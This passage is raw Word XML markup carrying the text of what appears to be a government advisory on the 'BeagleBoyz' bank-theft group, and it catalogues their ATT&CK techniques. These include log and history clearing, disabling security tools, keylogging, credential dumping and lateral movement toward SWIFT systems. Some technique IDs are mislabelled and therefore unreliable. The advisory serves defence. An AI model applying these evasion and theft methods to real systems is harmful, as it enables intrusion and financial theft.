      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by encrypting, encoding, or obfuscating its contents on the system or in transit (Obfuscated Files or Information [T1027])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F8294" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use external previously compromised web services to relay commands to a victim system (Web Service [T1102])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F12FD9" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use software packing to change the file signature, bypass signature-based detection, and decompress the executable code in memory (Unsecured Credentials: Private Keys [T1552.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC567A2" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use obfuscated files or information to hide intrusion artifacts (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/Decode Files or Information [T1140])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4225767C" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Modify the data timestamps (the modify, access, create, and change times fields) to mimic files that are in the same folder, making them appear inconspicuous to forensic analysts or file analysis tools (Indicator Removal on Host: Remove Timestamp [T1070.006])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F5B93" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse Windows utilities to implement arbitrary execution commands and subvert detection and mitigation controls (such as Group Policy) that limit or prevent the usage of cmd.exe or file extensions commonly associated with malicious payloads (Indirect Command Execution [T1202])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8D8CA" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use various methods to prevent their commands from appearing in logs and clear command history to remove activity traces (Indicator Removal on Host: Clear Command History [T1070.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9194AD" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable security tools to avoid possible detection of tools and events (Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Disable or Modify Tools [T1562.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F017BC6" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Steal the credentials of a specific user or service account to bypass access controls and grant increased privileges (Valid Accounts [T1078])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F64D59" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Delete or alter generated artifacts on a host system, including logs and potentially captured files, to remove traces of activity (Indicator Removal on Host: File Deletion [T1070.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320210D2" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse compiled HTML files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144C18B1" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prepend a space to all their terminal commands to operate without leaving traces in the HISTCONTROL environment, which is configured to ignore commands that start with a space (Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: HISTCONTROL [T1562.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465BEDF5" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Modify malware so it has a different signature and re-use it in cases when the group determines it was quarantined (Obfuscated Files or Information: Indicator Removal from Tools [T1027.005])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4978F" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt to block indicators or events typically captured by sensors from being gathered and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Indicator Blocking [T1562.006])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F734B2" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the Windows DLLs search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1574.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD7224" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Manipulate or abuse the attributes or location of an executable (masquerading) to better blend in with the environment and increase the chances of deceiving a security analyst or product (Masquerading [T1036])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0200DB59" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit rootkits to hide programs, files, network connections, services, drivers, and other system components (Rootkit [T1014])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BB09A" w14:textId="25A8846E" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse the Windows rundll32.exe to execute binaries, scripts, and .CPL files, and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED0736" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRPr="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5742A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413A563E" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may use malware like ECCENTRICBANDWAGON to log key strokes and take screen captures. The U.S. Government has identified some ECCENTRICBANDWAGON samples that have the ability to RC4 encrypt logged data, but the tool has no network functionality. The implant uses specific formatting for logged data and saves the file locally; another tool obtains the logged data. The implant also contains no mechanism for persistence or self-loading and expects a specific configuration file to be present on the system. A full technical report for ECCENTRICBANDWAGON is available at https://us-cert.cisa.gov/northkorea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760B6821" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A"/>
    <w:p w14:paraId="2EA6B180" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may not always need to use custom keyloggers like ECCENTRICBANDWAGON or other tools to obtain credentials from a compromised system. Depending on the victim’s environment, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to steal credentials (Credential Access [TA0006]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF44A8D" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A"/>
    <w:p w14:paraId="75DCCEE6" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capture user input, such as keylogging (the most prevalent type of input capture), to obtain credentials for valid accounts and information collection (Input Capture [T1056])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA38EE" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Obtain account login and password information, generally in the form of a hash or a clear text password, from the operating system and software (OS Credential Dumping [T1056])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4466C12D" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gather private keys from compromised systems to authenticate to remote services or decrypt other collected files (Unsecured Credentials: Private Keys [T1552.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DB676" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Manipulate default, domain, local, and cloud accounts to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DA1E9" w14:textId="77777777" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abuse hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process's memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1056.004])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED3D23" w14:textId="495995DC" w:rsidR="00A5742A" w:rsidRDefault="00A5742A" w:rsidP="00A5742A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable (Brute Force [T1110])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E07762" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRPr="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50CA0F" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:r>
        <w:t xml:space="preserve">Once inside a financial institution’s network, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> appear to seek two specific systems—the SWIFT terminal and the server hosting the institution’s payment switch application. As they progress through a network, they learn about the systems they have accessed in order to map the network and gain access to the two goal systems. To do so, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to gain knowledge about the systems and internal network (Discovery [TA0007]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65648B05" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6"/>
    <w:p w14:paraId="5D363C78" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAB8E4" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53A885" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674B7CE" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC2A3D" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner/User Discovery [T1033])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD15D0" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2ABA7C" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1440EC82" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BDF951" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281253D9" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6F2B0" w14:textId="7412F85B" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7679A1" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRPr="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F42D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24FD1D" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:r>
        <w:t xml:space="preserve">To access a compromised financial institution’s SWIFT terminal and the server hosting the institution’s payment switch application, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> leverage harvested credentials and take advantage of the accessibility of these critical systems from other systems in the institution’s corporate network. Specifically, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have been known to create firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443. Depending on the configuration of compromised systems and the security environment of the victim’s computer network, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to enter and control remote systems on a compromised network (Lateral Movement [TA0008]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F2378" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6"/>
    <w:p w14:paraId="00D07595" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy files from one system to another to stage adversary tools or other files throughout an operation (Ingress Tool Transfer [T1105])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B9770" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use Remote Desktop Protocol (RDP) to log into an interactive session with a system desktop GUI on a remote system (Remote Services: Remote Desktop Protocol [T1021.001])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D9A61" w14:textId="77777777" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ hidden network shares, in conjunction with administrator-level valid accounts, to remotely access a networked system over Server Message Block (SMB) in order to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote execution (Remote Services: SMB/Windows Admin Shares [T1021.002])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEA250" w14:textId="4373AD51" w:rsidR="004F42D6" w:rsidRDefault="004F42D6" w:rsidP="004F42D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit valid accounts to log into a service specifically designed to accept remote connections and perform actions as the logged-on user (Remote Services [T1021])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AACFBB" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRPr="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00347BA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F00E6D" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">Depending on various environmental attributes the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encounter during their exploitation, they may deploy a variety of reconnaissance tools or use commonly available administrative tools for malicious purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38664F1A" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="47F57AAD" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, like other sophisticated cyber actors, also appear to use resident, legitimate administrative tools for reconnaissance purposes when they are available; this is commonly known as “living off the land.” PowerShell appears to be a popular otherwise-legitimate tool the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>favor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for reconnaissance activities. For example, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> often use publicly available code from PowerShell Empire for malicious purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F701DB5" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="7B3080F1" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to gather information from exploited systems (Collection [TA0009]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF95BD" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5"/>
    <w:p w14:paraId="4CB0349F" w14:textId="77777777" w:rsidR="00347BA5" w:rsidRDefault="00347BA5" w:rsidP="00347BA5">
      <w:pPr>
